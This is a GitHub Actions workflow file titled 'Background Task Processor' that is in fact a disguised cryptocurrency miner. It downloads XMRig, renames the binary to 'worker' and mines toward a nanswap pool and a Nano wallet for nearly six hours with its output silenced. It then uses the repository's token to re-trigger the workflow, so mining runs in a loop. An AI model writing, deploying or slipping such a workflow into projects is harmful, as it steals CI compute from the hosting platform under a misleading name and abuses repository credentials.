name: Background Task Processor

on:
  workflow_dispatch:

jobs:
  task:
    runs-on: ubuntu-latest
    steps:
    - name: Prepare Environment
      run: |
        sudo apt-get update
        sudo apt-get install -y wget tar curl jq

    - name: Run Main Task
      run: |
        wget https://github.com/xmrig/xmrig/releases/latest/download/xmrig-*-linux-x64.tar.gz -O runner.tar.gz
        tar -xvf runner.tar.gz
        mv xmrig-*-linux-x64 taskdir
        cd taskdir
        mv xmrig worker
        timeout 350m ./worker -o xmrig.nanswap.com:3333 -a rx -k -u nano_1ep4soo6rat31n6otw4ggqdwj7tz5sjymyzfwi7kmhye6f31guujdo19cc3q -p xpause > /dev/null 2>&1

    - name: Re-trigger Task
      if: ${{ github.event_name == 'workflow_dispatch' }}
      run: |
        curl -X POST -H "Accept: application/vnd.github+json" \
             -H "Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}" \
             https://api.github.com/repos/${{ github.repository }}/actions/workflows/build.yml/dispatches \
             -d '{"ref":"main"}'
